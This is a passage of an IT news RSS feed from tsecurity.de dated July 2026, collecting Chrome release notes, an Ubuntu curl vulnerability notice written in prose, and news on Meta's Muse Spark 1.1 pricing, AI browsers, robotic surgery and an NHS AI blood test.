<p><strong>Dieser Artikel ist <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Gantt Chart Software in 2026: 8 Tools I Trust the Most]]></title>
<description><![CDATA[From clunky spreadsheets to modern project tools, I've tried it all. Here's the Gantt chart software worth switching to. 
The post Best Gantt Chart Software in 2026: 8 Tools I Trust the Most appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3661026/it-nachrichten/best-gantt-chart-software-in-2026-8-tools-i-trust-the-most/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661026/it-nachrichten/best-gantt-chart-software-in-2026-8-tools-i-trust-the-most/</guid>
<pubDate>Sat, 11 Jul 2026 02:16:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>From clunky spreadsheets to modern project tools, I've tried it all. Here's the Gantt chart software worth switching to. </p>
<p>The post <a href="https://www.techrepublic.com/article/best-gantt-chart-software/">Best Gantt Chart Software in 2026: 8 Tools I Trust the Most</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for ChromeOS / ChromeOS Flex]]></title>
<description><![CDATA[The ChromeOS Stable channel is being updated to OS version 16667.62.0 (Browser version 149.0.7827.238) for most ChromeOS devices.If you find new issues, please let us know one of the following ways:File a bugVisit our ChromeOS communitiesGeneral: Chromebook Help CommunityBeta Specific: ChromeOS B...]]></description>
<link>https://tsecurity.de/de/3660819/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660819/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</guid>
<pubDate>Fri, 10 Jul 2026 23:07:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span color="rgba(0, 0, 0, 0.87)">The ChromeOS Stable channel is being updated to OS version </span><span color="rgba(0, 0, 0, 0.87)">16667.62.0</span><span color="rgba(0, 0, 0, 0.87)"> (Browser version </span><span color="rgba(0, 0, 0, 0.87)">149.0.7827.238</span><span color="rgba(0, 0, 0, 0.87)">) for most ChromeOS devices.</span></p><div><span><span>If you find new issues, please let us know one of the following ways:</span></span></div><ol><li><span><span><a href="https://bugs.chromium.org/p/chromium/issues/list"><span>File a bug</span></a></span></span></li><li aria-level="1"><p role="presentation"><span><span>Visit our ChromeOS communities</span></span></p></li><ol><li aria-level="2"><p role="presentation"><span><span>General: </span><a href="https://support.google.com/chromebook/community/?hl=en&amp;gpf=%23!forum%2Fchromebook-central"><span>Chromebook Help Community</span></a></span></p></li><li aria-level="2"><p role="presentation"><span><span>Beta Specific: </span><a href="https://support.google.com/chromeos-beta/community"><span>ChromeOS Beta Help Community</span></a></span></p></li></ol><li aria-level="1"><p role="presentation"><a href="https://support.google.com/chrome/answer/95315?hl=en&amp;co=GENIE.Platform%3DDesktop"><span><span><span>Report an issue or send feedback on Chrome</span></span></span></a></p></li><li aria-level="1"><p role="presentation"><span><span>Interested in switching channels? </span><a href="https://support.google.com/chromebook/answer/1086915"><span>Find out how.</span></a></span></p></li></ol><p><span><span><span>Luis Menezes</span></span></span></p><p><span>Google ChromeOS</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Desktop Update]]></title>
<description><![CDATA[The Dev channel has been updated to 152.0.7939.3 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place to...]]></description>
<link>https://tsecurity.de/de/3660621/it-security-nachrichten/chrome-dev-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660621/it-security-nachrichten/chrome-dev-for-desktop-update/</guid>
<pubDate>Fri, 10 Jul 2026 20:35:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Dev channel has been updated to 152.0.7939.3 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/152.0.7928.2..152.0.7939.3?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybercriminals Flock to Healthcare Businesses as Attacks Surge]]></title>
<description><![CDATA[While cyberattacks against hospitals and clinics grew modestly in the first half of 2026, attacks on service providers and other healthcare businesses more than doubled.]]></description>
<link>https://tsecurity.de/de/3660455/it-security-nachrichten/cybercriminals-flock-to-healthcare-businesses-as-attacks-surge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660455/it-security-nachrichten/cybercriminals-flock-to-healthcare-businesses-as-attacks-surge/</guid>
<pubDate>Fri, 10 Jul 2026 19:09:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[While cyberattacks against hospitals and clinics grew modestly in the first half of 2026, attacks on service providers and other healthcare businesses more than doubled.]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT Atlas Is Shutting Down, But Here Are Some Popular Alternatives]]></title>
<description><![CDATA[OpenAI is officially pulling the plug on its dedicated web browser, but that does not mean you have to give up on smart web navigation. Since ChatGPT Atlas failed to capture a massive audience, the company decided to shut it down and move its core features to the desktop app. If you still want a ...]]></description>
<link>https://tsecurity.de/de/3660299/ios-mac-os/chatgpt-atlas-is-shutting-down-but-here-are-some-popular-alternatives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660299/ios-mac-os/chatgpt-atlas-is-shutting-down-but-here-are-some-popular-alternatives/</guid>
<pubDate>Fri, 10 Jul 2026 18:01:21 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI is officially pulling the plug on its dedicated web browser, but that does not mean you have to give up on smart web navigation. Since ChatGPT Atlas failed to capture a massive audience, the company decided to shut it down and move its core features to the desktop app. If you still want a dedicated browser built around artificial intelligence tools, you have several great alternatives available.



Popular alternatives like Comet and Dia lead the browser pack



While the ChatGPT Atlas browser is shutting down, other platforms are stepping up to fill the gap. Perplexity regularly updates its Comet browser, which works nicely with different artificial intelligence systems. Comet started on the Mac but is now making its way to mobile devices like the iPhone and iPad.



Another big option comes from The Browser Company, which recently launched Dia as the official successor to Arc. If you want something experimental, Opera Neon bills itself as an AI browser, though it requires a monthly subscription. A newcomer called Aside is also gaining attention as a lightweight choice for Mac users who want to keep things simple.



Chrome extensions and Safari offer simpler ways to stay connected



You do not necessarily need a brand-new browser to get these smart features. Before ending Atlas, OpenAI released a dedicated Chrome extension that brings the chatbot directly to any browser built on the Chromium engine. Google also includes Gemini right inside Chrome, giving users multiple ways to get help without switching their primary internet tool.



For users who want to keep their current setup untouched, sticking with Safari is completely fine. You can simply use standard web browsers and rely on background software like ChatGPT Codex to handle your complex online tasks. Even with Atlas gone, having smart tools in your daily internet routine is easier than ever to set up.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta launches low-cost Muse Spark 1.1 as enterprise AI spending comes under scrutiny]]></title>
<description><![CDATA[Meta has unveiled Muse Spark 1.1, saying the frontier AI model rivals leading LLMs on coding, computer use, and agentic AI benchmarks while undercutting OpenAI and Anthropic on API pricing, potentially lowering the cost of deploying AI agents in enterprises.



Meta unveiled Muse Spark 1.1 on Thu...]]></description>
<link>https://tsecurity.de/de/3659379/it-nachrichten/meta-launches-low-cost-muse-spark-11-as-enterprise-ai-spending-comes-under-scrutiny/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659379/it-nachrichten/meta-launches-low-cost-muse-spark-11-as-enterprise-ai-spending-comes-under-scrutiny/</guid>
<pubDate>Fri, 10 Jul 2026 12:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Meta has unveiled Muse Spark 1.1, saying the frontier AI model rivals leading LLMs on coding, computer use, and agentic AI benchmarks while undercutting OpenAI and Anthropic on API pricing, potentially lowering the cost of deploying AI agents in enterprises.</p>



<p>Meta unveiled Muse Spark 1.1 on Thursday, pairing frontier-model performance with aggressive pricing in a move that analysts say could pressure rivals such as OpenAI and Anthropic and reshape enterprise AI procurement decisions.</p>



<p>Meta is betting that lower inference costs can help it gain ground in the enterprise AI market with the launch of Muse Spark 1.1, a frontier model that rivals top competitors on key benchmarks while costing a fraction as much to deploy.</p>



<p>The latest model, which was <a href="https://www.infoworld.com/article/4192724/metas-ai-chief-says-new-muse-spark-update-will-sharpen-coding-agentic-ai.html" target="_blank">teased</a> last week, matched or was competitive with leading models, such as Claude Opus 4.8, Gemini 3.1 Pro, and GPT 5.5, across several agentic AI, coding, and computer-use benchmarks, including SWE-bench Verified, Terminal-bench, BrowseComp, SpreadsheetBench, and OSWorld, Meta wrote in a blog <a href="https://ai.meta.com/blog/introducing-muse-spark-meta-model-api/" target="_blank" rel="noreferrer noopener">post</a>.</p>



<p>Muse Spark 1.1, which is currently in public preview and available via the Meta Model API, will cost $1.25 per million input tokens and $4.25 per million output tokens, the company <a href="https://developer.meta.com/ai/products/meta-model-api/" target="_blank" rel="noreferrer noopener">noted</a>.</p>



<p>By comparison, OpenAI <a href="https://developers.openai.com/api/docs/pricing" target="_blank" rel="noreferrer noopener">charges</a> $5 per million input tokens and $30 per million output tokens for GPT-5.5, while Anthropic <a href="https://platform.claude.com/docs/en/about-claude/pricing" target="_blank" rel="noreferrer noopener">charges</a> $5 and $25, respectively, for Claude Opus 4.8. Google’s Gemini 3.1 Pro, on the other hand, is <a href="https://ai.google.dev/gemini-api/docs/pricing">priced</a> at $2 per million input tokens and $12 per million output tokens.</p>



<h2 class="wp-block-heading">Lower prices may open doors, not close deals</h2>



<p>That sheer difference in API pricing, according to <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, is enough to attract CIOs’ attention, at least for pilots, at a time when enterprises are trying to scale agentic deployments: “Pricing matters because inference costs increase rapidly when thousands of agents are working continuously.”</p>



<p>“Output tokens are often the largest model expense in coding, customer service, and process automation agents. Muse Spark’s output price is about 86% below GPT-5.5 and more than 90% below Claude Opus 4.8,” Jain said.</p>



<p>However, <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at FinOps services providing firm ZopDev, pointed out that the price is not a guarantee of adoption, despite the fact that most enterprises are likely to deploy the Muse Spark 1.1 for new projects.</p>



<p>“Cost becomes the primary differentiator only once the model is judged good enough. Developers don’t pick the cheapest model; they pick the cheapest model that clears their quality bar. So, price is the reason people show up, capability is the reason they stay,” Bandta said.</p>



<p>Similarly, CIOs are also likely to put more emphasis on the model’s security, data protection, uptime, audit trails, regional availability, support, and predictable behavior, rather than just the price, Jain said.</p>



<p>That distinction, according to Bandta, reflects a familiar pattern in enterprise technology buying: “This is the same lesson we saw in the cloud, where the cheapest provider on paper rarely won the biggest enterprise share. Price is one input in the total cost of ownership that includes risk, control, and switching cost, not the whole decision.”</p>



<p>Even so, the lower pricing could still shift the balance of power in enterprise procurement, Jain said: “This could help CIOs negotiate larger volume discounts, committed-use agreements, and better pricing from OpenAI, Anthropic, and cloud providers. It also strengthens the case for multi-model procurement rather than depending on one vendor.”</p>



<p>“Companies that do not even adopt Muse Spark can also use its pricing as evidence that frontier-level inference is becoming cheaper,” Jain added.</p>



<h2 class="wp-block-heading">Meta’s pricing could reshape competition between rivals</h2>



<p>Analysts pointed out that Meta’s new model could intensify competition in the frontier model market by forcing rivals to compete on inference economics and model sizes.</p>



<p>“It’s a real shot across the bow, and I’d expect OpenAI and Anthropic to respond on two fronts. Some of it will be price, cheaper tiers, and better cached and batch rates, because Meta has just reset what the market thinks a frontier token should cost,” Bandta said.</p>



<p>“But the incumbents won’t win the race with lower-priced offerings and more flexible pricing models. I expect them to lean harder into the things price can’t buy, governance, security, reliability, and enterprise support, to justify premium pricing,” Bandta added, likening the shift to an “early innings” of a price war that the industry saw with the expansion of cloud.</p>



<p>“The cloud infrastructure price war showed that while prices fell over time, vendors ultimately differentiated themselves through platform capabilities rather than cost alone,” Bandta further added.</p>



<p>In contrast, <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, head of AI at IT consulting firm Kanerika, pointed out that a cloud-infrastructure-style pricing war was unlikely: “Frontier models are capital-intensive; margins are already thin. Vendors can’t sustain aggressive repricing without sacrificing quality.”</p>



<p>Rather, Jena sees Meta increasing prices soon after launch: “History suggests what happens next — aggressive entry pricing, then repricing once market share solidifies. See Meta’s advertising platform and cloud pricing evolution across the industry. If that pattern repeats, pricing could rise 30–50% in 18–24 months.”</p>



<p>For now, Meta is offering developers $20 in free API credits to experiment with Muse Spark 1.1.</p>



<p><em>The article originally appeared on <a href="https://www.infoworld.com/article/4195519/meta-launches-low-cost-muse-spark-1-1-as-enterprise-ai-spending-comes-under-scrutiny.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta launches low-cost Muse Spark 1.1 as enterprise AI spending comes under scrutiny]]></title>
<description><![CDATA[Meta has unveiled Muse Spark 1.1, saying the frontier AI model rivals leading LLMs on coding, computer use, and agentic AI benchmarks while undercutting OpenAI and Anthropic on API pricing, potentially lowering the cost of deploying AI agents in enterprises.



Meta unveiled Muse Spark 1.1 on Thu...]]></description>
<link>https://tsecurity.de/de/3659344/ai-nachrichten/meta-launches-low-cost-muse-spark-11-as-enterprise-ai-spending-comes-under-scrutiny/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659344/ai-nachrichten/meta-launches-low-cost-muse-spark-11-as-enterprise-ai-spending-comes-under-scrutiny/</guid>
<pubDate>Fri, 10 Jul 2026 12:04:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Meta has unveiled Muse Spark 1.1, saying the frontier AI model rivals leading LLMs on coding, computer use, and agentic AI benchmarks while undercutting OpenAI and Anthropic on API pricing, potentially lowering the cost of deploying AI agents in enterprises.</p>



<p>Meta unveiled Muse Spark 1.1 on Thursday, pairing frontier-model performance with aggressive pricing in a move that analysts say could pressure rivals such as OpenAI and Anthropic and reshape enterprise AI procurement decisions.</p>



<p>Meta is betting that lower inference costs can help it gain ground in the enterprise AI market with the launch of Muse Spark 1.1, a frontier model that rivals top competitors on key benchmarks while costing a fraction as much to deploy.</p>



<p>The latest model, which was <a href="https://www.infoworld.com/article/4192724/metas-ai-chief-says-new-muse-spark-update-will-sharpen-coding-agentic-ai.html" target="_blank">teased</a> last week, matched or was competitive with leading models, such as Claude Opus 4.8, Gemini 3.1 Pro, and GPT 5.5, across several agentic AI, coding, and computer-use benchmarks, including SWE-bench Verified, Terminal-bench, BrowseComp, SpreadsheetBench, and OSWorld, Meta wrote in a blog <a href="https://ai.meta.com/blog/introducing-muse-spark-meta-model-api/" target="_blank" rel="noreferrer noopener">post</a>.</p>



<p>Muse Spark 1.1, which is currently in public preview and available via the Meta Model API, will cost $1.25 per million input tokens and $4.25 per million output tokens, the company <a href="https://developer.meta.com/ai/products/meta-model-api/" target="_blank" rel="noreferrer noopener">noted</a>.</p>



<p>By comparison, OpenAI <a href="https://developers.openai.com/api/docs/pricing" target="_blank" rel="noreferrer noopener">charges</a> $5 per million input tokens and $30 per million output tokens for GPT-5.5, while Anthropic <a href="https://platform.claude.com/docs/en/about-claude/pricing" target="_blank" rel="noreferrer noopener">charges</a> $5 and $25, respectively, for Claude Opus 4.8. Google’s Gemini 3.1 Pro, on the other hand, is <a href="https://ai.google.dev/gemini-api/docs/pricing">priced</a> at $2 per million input tokens and $12 per million output tokens.</p>



<h2 class="wp-block-heading">Lower prices may open doors, not close deals</h2>



<p>That sheer difference in API pricing, according to <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, is enough to attract CIOs’ attention, at least for pilots, at a time when enterprises are trying to scale agentic deployments: “Pricing matters because inference costs increase rapidly when thousands of agents are working continuously.”</p>



<p>“Output tokens are often the largest model expense in coding, customer service, and process automation agents. Muse Spark’s output price is about 86% below GPT-5.5 and more than 90% below Claude Opus 4.8,” Jain said.</p>



<p>However, <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at FinOps services providing firm ZopDev, pointed out that the price is not a guarantee of adoption, despite the fact that most enterprises are likely to deploy the Muse Spark 1.1 for new projects.</p>



<p>“Cost becomes the primary differentiator only once the model is judged good enough. Developers don’t pick the cheapest model; they pick the cheapest model that clears their quality bar. So, price is the reason people show up, capability is the reason they stay,” Bandta said.</p>



<p>Similarly, CIOs are also likely to put more emphasis on the model’s security, data protection, uptime, audit trails, regional availability, support, and predictable behavior, rather than just the price, Jain said.</p>



<p>That distinction, according to Bandta, reflects a familiar pattern in enterprise technology buying: “This is the same lesson we saw in the cloud, where the cheapest provider on paper rarely won the biggest enterprise share. Price is one input in the total cost of ownership that includes risk, control, and switching cost, not the whole decision.”</p>



<p>Even so, the lower pricing could still shift the balance of power in enterprise procurement, Jain said: “This could help CIOs negotiate larger volume discounts, committed-use agreements, and better pricing from OpenAI, Anthropic, and cloud providers. It also strengthens the case for multi-model procurement rather than depending on one vendor.”</p>



<p>“Companies that do not even adopt Muse Spark can also use its pricing as evidence that frontier-level inference is becoming cheaper,” Jain added.</p>



<h2 class="wp-block-heading">Meta’s pricing could reshape competition between rivals</h2>



<p>Analysts pointed out that Meta’s new model could intensify competition in the frontier model market by forcing rivals to compete on inference economics and model sizes.</p>



<p>“It’s a real shot across the bow, and I’d expect OpenAI and Anthropic to respond on two fronts. Some of it will be price, cheaper tiers, and better cached and batch rates, because Meta has just reset what the market thinks a frontier token should cost,” Bandta said.</p>



<p>“But the incumbents won’t win the race with lower-priced offerings and more flexible pricing models. I expect them to lean harder into the things price can’t buy, governance, security, reliability, and enterprise support, to justify premium pricing,” Bandta added, likening the shift to an “early innings” of a price war that the industry saw with the expansion of cloud.</p>



<p>“The cloud infrastructure price war showed that while prices fell over time, vendors ultimately differentiated themselves through platform capabilities rather than cost alone,” Bandta further added.</p>



<p>In contrast, <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, head of AI at IT consulting firm Kanerika, pointed out that a cloud-infrastructure-style pricing war was unlikely: “Frontier models are capital-intensive; margins are already thin. Vendors can’t sustain aggressive repricing without sacrificing quality.”</p>



<p>Rather, Jena sees Meta increasing prices soon after launch: “History suggests what happens next — aggressive entry pricing, then repricing once market share solidifies. See Meta’s advertising platform and cloud pricing evolution across the industry. If that pattern repeats, pricing could rise 30–50% in 18–24 months.”</p>



<p>For now, Meta is offering developers $20 in free API credits to experiment with Muse Spark 1.1.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Humanoid Robots Controlled By Surgeons Did World-First Operation On Live Pigs]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Humanoid robots have surgically removed the gallbladders from living animals in an unprecedented medical experiment -- but not as autonomous machines capable of replacing human doctors. Instead, skilled human surgeons remotely controlled the ...]]></description>
<link>https://tsecurity.de/de/3658613/it-security-nachrichten/humanoid-robots-controlled-by-surgeons-did-world-first-operation-on-live-pigs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658613/it-security-nachrichten/humanoid-robots-controlled-by-surgeons-did-world-first-operation-on-live-pigs/</guid>
<pubDate>Fri, 10 Jul 2026 05:37:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Humanoid robots have surgically removed the gallbladders from living animals in an unprecedented medical experiment -- but not as autonomous machines capable of replacing human doctors. Instead, skilled human surgeons remotely controlled the robots' movements in a new example of human-robot teamups. The teleoperated humanoid robots completed two minimally invasive surgeries by removing gallbladders from live pigs during a preclinical trial that was published in the journal Nature. If this approach eventually proves clinically ready for human patients, surgeons could use such humanoid robots to remotely perform robotic-assisted surgical care in smaller hospitals and clinics that lack the resources to install specialized but expensive surgical robots.
 
The experiment used a Unitree G1 humanoid robot made by leading Chinese robotics company Unitree. The cheapest baseline G1 model with effectively non-functional hands has a starting price of $13,500 and shipping costs ranging between $300 and $1,200, whereas adding crucial upgrades such as dexterous robotic hands can easily push the cost beyond $67,000. But such humanoid robots made in China are still significantly cheaper than specialized surgical robots like Intuitive Surgical's da Vinci Surgical System, which can cost anywhere between half a million dollars and several million dollars. The specialized surgical robots can also weigh about 1,800 pounds and take up considerably more space in operating rooms. By comparison, the Unitree humanoid robots, standing at 5 feet tall and weighing just 60 pounds, may be more suitable for smaller clinical settings in remote areas.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Humanoid+Robots+Controlled+By+Surgeons+Did+World-First+Operation+On+Live+Pigs%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F10%2F0128252%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F10%2F0128252%2Fhumanoid-robots-controlled-by-surgeons-did-world-first-operation-on-live-pigs%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/07/10/0128252/humanoid-robots-controlled-by-surgeons-did-world-first-operation-on-live-pigs?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8525-1: curl vulnerabilities]]></title>
<description><![CDATA[Harry Sintonen discovered that curl incorrectly handled credentials when
following HTTP redirects in conjunction with .netrc files. An attacker
could possibly use this issue to obtain sensitive information. This issue
only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 18.04 LTS.
(CVE-20...]]></description>
<link>https://tsecurity.de/de/3658251/unix-server/usn-8525-1-curl-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658251/unix-server/usn-8525-1-curl-vulnerabilities/</guid>
<pubDate>Thu, 09 Jul 2026 23:01:00 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Harry Sintonen discovered that curl incorrectly handled credentials when
following HTTP redirects in conjunction with .netrc files. An attacker
could possibly use this issue to obtain sensitive information. This issue
only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 18.04 LTS.
(CVE-2024-11053)

Hiroki Kurosawa discovered that curl incorrectly handled OCSP stapling
responses. A remote attacker could possibly use this issue to obtain
sensitive information. This issue only affected Ubuntu 16.04 LTS and Ubuntu
18.04 LTS. (CVE-2024-8096)

Joshua Rogers discovered that curl had a use-after-free vulnerability when
resetting and cleaning up HTTP/2 stream handles. An attacker could possibly
use this issue to cause a denial of service or execute arbitrary code. This
issue only affected Ubuntu 24.04 LTS, Ubuntu 25.04, and Ubuntu 25.10.
(CVE-2026-10536)

Quac Tran and Ngoc Hieu discovered that curl incorrectly reused connections
when switching authentication methods to the same host. An attacker could
possibly use this issue to obtain sensitive information or perform
unauthorized actions. This issue only affected Ubuntu 20.04 LTS.
(CVE-2026-5545)

Osama Hamad discovered that curl incorrectly reused SMB connections when
the target share differed between transfers. An attacker could possibly use
this issue to obtain sensitive information. This issue only affected Ubuntu
16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS. (CVE-2026-5773)

Muhamad Arga Reksapati discovered that curl incorrectly forwarded Digest
proxy authentication credentials to a different proxy host. An attacker
could possibly use this issue to obtain sensitive information. This issue
only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2026-7168)

It was discovered that curl incorrectly skipped SSH host verification
options when using schemeless URLs with --proto-default. An attacker could
possibly use this issue to perform machine-in-the-middle attacks. This
issue only affected Ubuntu 25.04 and Ubuntu 25.10. (CVE-2026-12064)

It was discovered that curl did not enforce an upper bound on memory
allocated for unacknowledged WebSocket PING frames. A remote attacker could
possibly use this issue to cause a denial of service. This issue only
affected Ubuntu 25.10. (CVE-2026-11586)

It was discovered that curl could stall indefinitely when a malicious
HTTP/3 server sent a continuous stream of empty UDP datagrams. A remote
attacker could possibly use this issue to cause a denial of service. This
issue only affected Ubuntu 25.10. (CVE-2026-11352)

It was discovered that curl could incorrectly continue trusting a native
platform CA store after an application switched the handle to use custom CA
material. An attacker could possibly use this issue to obtain sensitive
information. This issue only affected Ubuntu 25.10. (CVE-2026-11564)]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Desktop Update]]></title>
<description><![CDATA[The Beta channel has been updated to 151.0.7922.19 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place ...]]></description>
<link>https://tsecurity.de/de/3657909/it-security-nachrichten/chrome-beta-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657909/it-security-nachrichten/chrome-beta-for-desktop-update/</guid>
<pubDate>Thu, 09 Jul 2026 19:53:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Beta channel has been updated to 151.0.7922.19 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.10..151.0.7922.19?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NHS AI blood test could reduce invasive womb cancer checks]]></title>
<description><![CDATA[Several NHS hospitals are preparing to use an AI-powered blood test to help assess women referred for possible womb cancer before invasive checks are carried out. According to The Guardian, around 90,000 postmenopausal women in England are referred by GPs each year for checks after experiencing h...]]></description>
<link>https://tsecurity.de/de/3656635/ai-nachrichten/nhs-ai-blood-test-could-reduce-invasive-womb-cancer-checks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656635/ai-nachrichten/nhs-ai-blood-test-could-reduce-invasive-womb-cancer-checks/</guid>
<pubDate>Thu, 09 Jul 2026 12:18:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Several NHS hospitals are preparing to use an AI-powered blood test to help assess women referred for possible womb cancer before invasive checks are carried out. According to The Guardian, around 90,000 postmenopausal women in England are referred by GPs each year for checks after experiencing heavy bleeding. About 10,000 women are diagnosed with womb […]</p>
<p>The post <a href="https://www.artificialintelligence-news.com/news/nhs-ai-blood-test-womb-cancer-checks/">NHS AI blood test could reduce invasive womb cancer checks</a> appeared first on <a href="https://www.artificialintelligence-news.com/">AI News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Revving up Microsoft’s 10x faster TypeScript 7]]></title>
<description><![CDATA[It has been a year or so since Microsoft announced its plans to move TypeScript to a new, native runtime based on the Go language. Those first releases were unfinished (you had to compile them yourself) but showed promise, getting close to the expected 10x speed-up. That year has been one of stea...]]></description>
<link>https://tsecurity.de/de/3656432/ai-nachrichten/revving-up-microsofts-10x-faster-typescript-7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656432/ai-nachrichten/revving-up-microsofts-10x-faster-typescript-7/</guid>
<pubDate>Thu, 09 Jul 2026 11:03:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



